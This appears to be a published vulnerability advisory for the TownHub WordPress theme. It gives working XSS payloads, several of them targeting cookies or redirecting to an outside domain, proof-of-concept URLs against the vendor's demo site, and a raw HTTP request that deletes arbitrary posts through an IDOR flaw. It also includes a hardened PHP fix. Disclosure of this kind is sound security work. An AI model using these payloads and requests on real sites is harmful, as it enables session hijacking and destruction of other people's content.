TownHub < 1.0.6 - Multiple Vulnerabilities



Description
Multiple vulnerabilities were discovered in the «TownHub - Directory & Listing WordPress Theme» (tested version: v1.0.2):

- Unauthenticated XSS
- Authenticated Persistent XSS
- IDOR

Edit (WPScanTeam):
December 27th, 2019 - Envato Contacted
January 5th, 2020 - Envato Investigating
January 6th, 2020 - v1.0.6 released

Proof of Concept
----[]- Info: -[]----
Demo website: https://townhub.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://townhub.cththemes.com/dashboard/?dashboard=listings
Google Dork: /wp-content/themes/townhub/
Date: 27/12/2019


----[]- Reflected XSS: -[]----
The input field with the placeholder «What are you looking for?» on the homepage is vulnerable, as is the regular search box (the block next to the website logo).

Payload Sample #0: <img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #1: https://townhub.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=


----[]- Persistent XSS -> Chat: -[]----
Chat messages (sent from https://townhub.cththemes.com/dashboard/?dashboard=chats or from the chat widget in the bottom right corner) are vulnerable to persistent XSS: any cookie-stealing payload can be used to hijack a user's or administrator's session, or to force a redirect to a malicious website.

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>


----[]- Persistent XSS -> Listing page: -[]----
Add a new listing at https://townhub.cththemes.com/submit-listing/#/ (the first time, you need to order the «Free» plan and then open this URL again).
Vulnerable input fields: «Address», «Latitude (Drag marker on the map)», «Longitude (Drag marker on the map)», «Email Address», «Phone Number» and «Website». A payload placed in the «Address», «Latitude (Drag marker on the map)» or «Longitude (Drag marker on the map)» fields is also rendered on the admin dashboard, so it is possible to steal administrator cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>


----[]- IDOR: -[]----
Any post, page or listing can be deleted with the following request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: townhub.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: https://townhub.cththemes.com
DNT: 1
Connection: close
Referer: https://townhub.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_cookies_here_
Pragma: no-cache
Cache-Control: no-cache

lid=XXXX&action=townhub_addons_delete_listing&_nonce=3fb56225d8&_wpnonce=3fb56225d8

Where:
lid=XXXX is the unique WordPress ID of the page/post/listing; it is exposed in the class attribute of the page's <body> tag.
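The request above carries a valid nonce, so the root cause is missing authorization, not missing CSRF protection. The following is an added example (not the theme's code) of how the handler for the townhub_addons_delete_listing action could be hardened; the nonce action name and the «listing» post type name are assumptions.

```php
<?php
// Added example, not TownHub's own code: a hardened admin-ajax handler for the
// "townhub_addons_delete_listing" action. Hooked only on wp_ajax_ (not
// wp_ajax_nopriv_), so unauthenticated callers never reach it.
add_action( 'wp_ajax_townhub_addons_delete_listing', 'hardened_delete_listing' );

function hardened_delete_listing() {
    // 1. CSRF protection: the nonce must be valid for this action. The nonce
    //    action name and the "_nonce" field name are assumed here.
    check_ajax_referer( 'townhub_addons_delete_listing', '_nonce' );

    // 2. Validate the identifier: an integer post ID and nothing else.
    $lid  = isset( $_POST['lid'] ) ? absint( $_POST['lid'] ) : 0;
    $post = $lid ? get_post( $lid ) : null;

    // 3. Only the expected post type may be deleted through this endpoint;
    //    otherwise any page or post ID could be supplied (post type assumed).
    if ( ! $post || 'listing' !== $post->post_type ) {
        wp_send_json_error( array( 'message' => 'Listing not found.' ), 404 );
    }

    // 4. Authorization, the check the vulnerable version lacks: the caller
    //    must own the listing or hold a capability covering other users' posts.
    $is_owner = (int) $post->post_author === get_current_user_id();
    if ( ! $is_owner && ! current_user_can( 'delete_post', $lid ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    // 5. Trash rather than hard-delete so a mistaken request can be reverted.
    if ( ! wp_trash_post( $lid ) ) {
        wp_send_json_error( array( 'message' => 'Delete failed.' ), 500 );
    }
    wp_send_json_success( array( 'lid' => $lid ) );
}
```

The same pattern applies to the other dashboard actions: a nonce proves the request came from the site's own page, while the ownership or capability check proves the user may act on that particular object.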

Affects Theme

Fixed in version 1.0.6

References

CVE 2019-20209
CVE 2019-20210
CVE 2019-20211
CVE 2019-20212
URL https://themeforest.net/item/townhub-directory-listing-wordpress-theme/25019571

Classification

Type MULTI

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Verified Yes
WPVDB ID 10014

Timeline

Publicly Published 2020-01-09
Added 2020-01-09
Last Updated 2020-01-14
